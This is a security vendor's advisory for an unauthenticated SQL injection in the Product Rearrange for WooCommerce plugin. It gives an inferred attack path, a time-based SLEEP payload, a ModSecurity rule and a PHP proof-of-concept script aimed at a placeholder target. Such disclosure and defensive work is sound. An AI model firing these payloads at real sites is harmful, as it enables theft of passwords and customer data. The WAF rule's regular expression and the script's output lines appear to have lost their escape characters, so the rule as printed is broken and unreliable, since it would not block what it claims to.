Atomic Edge analysis of CVE-2026-31920 (metadata-based): This vulnerability is an unauthenticated SQL injection in the Product Rearrange for WooCommerce WordPress plugin, affecting versions up to and including 1.2.2. The flaw allows attackers to execute arbitrary SQL commands via a user-controlled parameter, leading to sensitive data disclosure. The CVSS score of 7.5 (High) reflects its network-based attack vector and high impact on confidentiality.
The root cause is improper neutralization of special elements in an SQL command (CWE-89). The vulnerability description states insufficient escaping on a user-supplied parameter and a lack of sufficient preparation on an existing SQL query. Atomic Edge research infers the plugin likely constructs an SQL query by directly concatenating unsanitized user input, bypassing the use of prepared statements via the `$wpdb` class. This conclusion is based on the CWE classification and the description’s mention of insufficient escaping, not direct code review.
Exploitation likely occurs via a public-facing WordPress AJAX endpoint. The plugin slug ‘products-rearrange-woocommerce’ suggests an AJAX action parameter such as ‘products_rearrange_woocommerce_action’ or a similar variant. An unauthenticated attacker can send a POST request to `/wp-admin/admin-ajax.php` with a malicious payload in a parameter like ‘order’ or ‘ids’. A payload such as `1′ AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)–` would confirm injection by triggering a time delay.
Remediation requires implementing proper input validation and using parameterized queries. The plugin must replace direct string concatenation in SQL statements with the `$wpdb->prepare()` method. All user-supplied parameters used in database operations must be sanitized and validated. A patched version should also implement proper capability checks for any administrative actions, though the unauthenticated nature suggests such checks were entirely absent.
Successful exploitation grants attackers the ability to read sensitive information from the WordPress database. This includes hashed user passwords, session tokens, personal identifiable information, and WooCommerce order data. Attackers could extract the entire database contents, leading to a full site compromise. The vulnerability does not directly allow for privilege escalation or remote code execution based on the CVSS vector, which indicates no impact on integrity or availability.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-31920 (metadata-based)
# This rule blocks exploitation of the unauthenticated SQL injection in the Product Rearrange for WooCommerce plugin.
# The rule matches requests to the WordPress AJAX handler containing the inferred plugin action and common SQL injection patterns in likely parameters.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:10031920,phase:2,deny,status:403,chain,msg:'CVE-2026-31920: Unauthenticated SQL Injection in Product Rearrange for WooCommerce Plugin via AJAX',severity:'CRITICAL',tag:'CVE-2026-31920',tag:'WordPress',tag:'Plugin',tag:'WooCommerce',tag:'SQLi'"
SecRule ARGS_POST:action "@rx ^(products_rearrange_woocommerce|woocommerce_product_rearrange)"
"chain,t:none"
SecRule ARGS_POST:ids|ARGS_POST:order "@rx (?i)(?:sleep(s*d|benchmarks*(|waitfors+delay|pg_sleep(|b(?:unions+select|selects+from|inserts+into|updates+w+s+set|deletes+from)b|'s*(?:--|#|/*))"
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-31920 - Product Rearrange for WooCommerce <= 1.2.2 - Unauthenticated SQL Injection
<?php
/**
* Proof of Concept for CVE-2026-31920.
* This script attempts to exploit an unauthenticated SQL injection vulnerability.
* The exact AJAX action and parameter names are inferred from the plugin slug and common patterns.
* Assumptions:
* 1. The target runs a vulnerable version (<=1.2.2) of the plugin.
* 2. The plugin registers a WordPress AJAX action hook accessible to unauthenticated users (nopriv).
* 3. The vulnerable parameter is named 'ids' or 'order', common for a product rearrange function.
*/
$target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS
// Inferred AJAX action. Common pattern is plugin slug with underscores.
$inferred_action = 'products_rearrange_woocommerce_update_order';
// Time-based SQL injection payload for MySQL.
// This payload causes a 5-second delay if injection is successful and the database is MySQL.
$malicious_parameter = "1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--";
// Prepare POST data. Testing two common parameter names.
$post_data = array(
'action' => $inferred_action,
'ids' => $malicious_parameter, // Primary test parameter
'order' => $malicious_parameter // Alternative test parameter
);
// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 15); // Increase timeout to detect sleep
// Measure response time to detect time-based injection
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$elapsed_time = $end_time - $start_time;
curl_close($ch);
// Analysis
if ($elapsed_time >= 5) {
echo "[+] Potential SQL Injection SUCCESSFUL. Response delayed by " . round($elapsed_time, 2) . " seconds.n";
echo "[+] The site is likely vulnerable to CVE-2026-31920.n";
} else {
echo "[-] No time delay detected (" . round($elapsed_time, 2) . " seconds). Injection may have failed.n";
echo "[-] The site may not be vulnerable, or the inferred action/parameter is incorrect.n";
echo "[-] Raw response (first 500 chars): " . substr($response, 0, 500) . "n";
}
?>
